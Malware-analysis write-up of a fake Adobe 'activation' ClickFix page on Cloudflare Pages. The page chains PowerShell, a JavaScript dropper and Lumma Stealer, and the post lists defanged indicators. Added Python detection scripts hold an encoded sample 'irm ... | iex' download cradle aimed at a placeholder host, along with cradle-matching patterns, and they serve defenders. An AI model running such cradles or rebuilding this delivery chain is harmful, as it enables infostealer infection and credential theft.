ClickFix Site Abusing Cloudflare Pages to Deliver Lumma Stealer

While looking for phishing sites, I came across a suspicious Cloudflare Pages site hosted at:

hxxps://zipsage.pages[.]dev

The site presents itself as an “Adobe Activation Guide” and instructs users to manually execute a PowerShell command, a technique commonly associated with ClickFix malware delivery.

Fake Adobe Activation Page

The landing page attempts to socially engineer users into copying and executing a malicious PowerShell command under the pretense of activating Adobe software.

The page instructs users to execute the following command:

The Base64-decoded command is:

This uses Invoke-RestMethod (irm) to fetch a remote PowerShell script and pipes it straight into Invoke-Expression (iex), so the next stage runs in memory without the script being written to disk.

PowerShell Stage

The retrieved PowerShell script downloads and launches a JavaScript file from the same infrastructure.

Script.ps1:

The script downloads script.js into the temporary directory and executes it silently using wscript.exe.
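The two stages above (an encoded irm | iex cradle, then wscript.exe running a script out of the temp directory) are both visible in process-creation telemetry. The following is an added detection example, not code from the post or from the actor's chain: it decodes the Base64 carried on a PowerShell command line (both the -EncodedCommand form, which is UTF-16LE, and the inline FromBase64String form, which is normally UTF-8), flags a download cradle, and flags a script host or executable running from %TEMP%. The sample events, hostnames, paths and the https://example.invalid URL are constructed placeholders; the cradle check also covers iwr/Invoke-WebRequest, which the post does not mention but which is the usual sibling of irm.

```python
import base64
import binascii
import re

# Two ways Base64 usually reaches powershell.exe on a command line.
ENC_FLAG_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
B64_LITERAL_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)", re.I)
# Download cradle: a web fetch piped straight into Invoke-Expression. The post
# shows irm | iex; iwr/Invoke-WebRequest is the equally common sibling form.
CRADLE_RE = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b.*\|\s*(iex|invoke-expression)\b", re.I)
TEMP_PATH_RE = re.compile(r"(\\Temp\\|%TEMP%\\)", re.I)
SCRIPT_EXT_RE = re.compile(r"\.(js|jse|vbs|wsf)\b", re.I)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")


def _decode_b64(blob, encoding):
    """Decode Base64 text with the given encoding; None if it is not valid."""
    try:
        return base64.b64decode(blob, validate=True).decode(encoding)
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def decode_powershell_b64(cmdline):
    """Decode the Base64 payload on a PowerShell command line, or return None.

    -EncodedCommand is always UTF-16LE, while inline FromBase64String literals
    are normally UTF-8, so each form gets its own decoding.
    """
    m = ENC_FLAG_RE.search(cmdline)
    if m:
        return _decode_b64(m.group(1), "utf-16-le")
    m = B64_LITERAL_RE.search(cmdline)
    if m:
        return _decode_b64(m.group(1), "utf-8")
    return None


def is_download_cradle(command):
    """True when the command fetches remote content and pipes it into iex."""
    return bool(CRADLE_RE.search(command))


def classify(event):
    """Return the names of the rules an event trips (empty list when benign)."""
    hits = []
    image = event["image"].lower()
    cmdline = event["cmdline"]
    if image.endswith(("powershell.exe", "pwsh.exe")):
        decoded = decode_powershell_b64(cmdline)
        if is_download_cradle(cmdline if decoded is None else decoded):
            hits.append("download_cradle" if decoded is None else "encoded_download_cradle")
    # Stage 2 of the chain: wscript.exe running a script out of %TEMP%.
    if image.endswith(SCRIPT_HOSTS) and TEMP_PATH_RE.search(cmdline) and SCRIPT_EXT_RE.search(cmdline):
        hits.append("script_host_from_temp")
    # Stage 3: an executable in %TEMP% whose parent is the script host.
    if TEMP_PATH_RE.search(event["image"]) and event["parent"].lower().endswith(SCRIPT_HOSTS):
        hits.append("exe_from_temp_via_script_host")
    return hits


def triage(events):
    """Group tripped rules by host, keeping only hosts with at least one hit."""
    findings = {}
    for ev in events:
        for rule in classify(ev):
            findings.setdefault(ev["host"], []).append(rule)
    return findings


# Constructed sample events in Sysmon-style fields. The URL is a placeholder,
# not the real staging host; the Base64 is generated here from that placeholder.
_STAGE1 = "irm https://example.invalid/script.ps1 | iex"
_ENC = base64.b64encode(_STAGE1.encode("utf-16-le")).decode()
_LIT = base64.b64encode(_STAGE1.encode("utf-8")).decode()
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_TEMP = r"C:\Users\u\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": _PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": f"powershell -w hidden -enc {_ENC}"},
    {"host": "ws-01", "image": r"C:\Windows\System32\wscript.exe", "parent": _PS,
     "cmdline": f"wscript.exe //B {_TEMP}\\script.js"},
    {"host": "ws-01", "image": f"{_TEMP}\\putty.exe", "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": f"{_TEMP}\\putty.exe"},
    {"host": "ws-02", "image": _PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -c \"iex([Text.Encoding]::UTF8.GetString("
                f"[Convert]::FromBase64String('{_LIT}')))\""},
    {"host": "ws-03", "image": _PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -NoProfile -Command Get-Service"},
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, rules)
```

The point of decoding before matching is that a rule keyed only on the literal text "irm" or "iex" never sees them in the -EncodedCommand case; decoding with the right encoding per form avoids both the miss and the garbage you get from decoding a UTF-8 literal as UTF-16LE. The third rule (executable in %TEMP% parented by wscript.exe) is what catches the putty.exe stage even after the script has deleted itself.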

JavaScript Downloader

The downloaded JavaScript file is heavily obfuscated and acts as a downloader/dropper.

The script downloads:

hxxps://get-1o8.pages[.]dev/putty.exe

The payload is stored as:

%TEMP%\putty.exe

Behavior observed from the JavaScript:

  • Downloads putty.exe
  • Executes the file
  • Waits for execution to finish
  • Deletes the payload afterward
  • Deletes the script itself

This cleanup behavior likely attempts to reduce forensic evidence on infected systems.

Lumma Stealer Network Activity

During execution, the sample generated multiple DNS and HTTP requests associated with Lumma Stealer infrastructure.

Observed domains:

sustainskelet[.]lat
sweepyribs[.]lat
grannyejh[.]lat
discokeyus[.]lat
necklacebudi[.]lat
energyaffai[.]lat
aspecteirs[.]lat
crosshuaht[.]lat
rapeflowwj[.]lat

The payload repeatedly generated POST requests to /api endpoints across multiple .lat domains, behavior consistent with Lumma Stealer activity.
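Repeated POSTs to /api across a set of sibling .lat domains is a pattern that can be hunted in proxy or DNS logs even before the specific domains are known. The following is an added example, not part of the original post: it matches log lines against the IOC domains listed below and, separately, flags any source host that POSTs to /api on several distinct domains under a watched TLD. The log format, timestamps, source hosts and benign lines are constructed; the .lat and pages.dev domains come from the write-up's own IOC list.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Domains taken from the IOC list in this write-up (de-fanged brackets removed).
IOC_DOMAINS = {
    "sustainskelet.lat", "sweepyribs.lat", "grannyejh.lat", "discokeyus.lat",
    "necklacebudi.lat", "energyaffai.lat", "aspecteirs.lat", "crosshuaht.lat",
    "rapeflowwj.lat", "get-1o8.pages.dev", "zipsage.pages.dev",
}

# Constructed proxy log lines, "timestamp src_host method url status".
# The .lat domains are from the IOC list; hosts, times and benign lines are made up.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z ws-01 POST https://sustainskelet.lat/api 404
2024-01-01T10:00:02Z ws-01 POST https://sweepyribs.lat/api 404
2024-01-01T10:00:03Z ws-01 POST https://grannyejh.lat/api 404
2024-01-01T10:00:04Z ws-01 POST https://discokeyus.lat/api 200
2024-01-01T10:00:05Z ws-02 POST https://api.example.com/api/v1/login 200
2024-01-01T10:00:06Z ws-02 GET https://www.example.com/ 200
2024-01-01T10:00:07Z ws-03 POST https://necklacebudi.lat/api 404
2024-01-01T10:00:08Z ws-03 GET https://get-1o8.pages.dev/script.ps1 200
"""


def parse_line(line):
    """Split one log line into its fields; the URL is broken into domain and path."""
    ts, src, method, url, status = line.split()
    parts = urlsplit(url)
    return {"ts": ts, "src": src, "method": method.upper(),
            "domain": parts.hostname.lower(), "path": parts.path, "status": int(status)}


def parse_log(text):
    """Parse every non-empty line of a log dump."""
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def match_iocs(events, iocs=IOC_DOMAINS):
    """Exact-match hits against the published IOC domains: {src: sorted domains}."""
    hits = defaultdict(set)
    for ev in events:
        if ev["domain"] in iocs:
            hits[ev["src"]].add(ev["domain"])
    return {src: sorted(d) for src, d in hits.items()}


def find_c2_fanout(events, tlds=("lat",), path_prefix="/api", min_domains=3):
    """Behavioural hunt that needs no IOC list: hosts POSTing to path_prefix on
    at least min_domains distinct domains under the watched TLDs. Rotating
    through sibling domains this way is the pattern the write-up describes."""
    seen = defaultdict(set)
    for ev in events:
        if ev["method"] != "POST" or not ev["path"].startswith(path_prefix):
            continue
        if ev["domain"].rsplit(".", 1)[-1] not in tlds:
            continue
        seen[ev["src"]].add(ev["domain"])
    return {src: sorted(d) for src, d in seen.items() if len(d) >= min_domains}


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    print("IOC hits:", match_iocs(events))
    print("fan-out:", find_c2_fanout(events))
```

The TLD filter is what keeps the legitimate POST to api.example.com/api/v1/login out of the fan-out result, and the min_domains threshold separates a host that walked the whole domain list (ws-01) from one that touched a single indicator (ws-03), which the exact IOC match still reports. Tune both to the environment; the .lat TLD and the /api path are specific to what this sample did.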

IOC

URLs

hxxps://zipsage.pages[.]dev
hxxps://get-1o8.pages[.]dev/script.ps1
hxxps://get-1o8.pages[.]dev/script.js
hxxps://get-1o8.pages[.]dev/putty.exe

Domains

get-1o8.pages[.]dev
zipsage.pages[.]dev
sustainskelet[.]lat
sweepyribs[.]lat
grannyejh[.]lat
discokeyus[.]lat
necklacebudi[.]lat
energyaffai[.]lat
aspecteirs[.]lat
crosshuaht[.]lat
rapeflowwj[.]lat
steamcommunity.com

File Hash

MD5: 3b8d7692966df16dde1da2887378e062

Dropped File

%TEMP%\putty.exe

Article Link: ClickFix Site Abusing Cloudflare Pages to Deliver Lumma Stealer – Malware Analysis, Phishing, and Email Scams
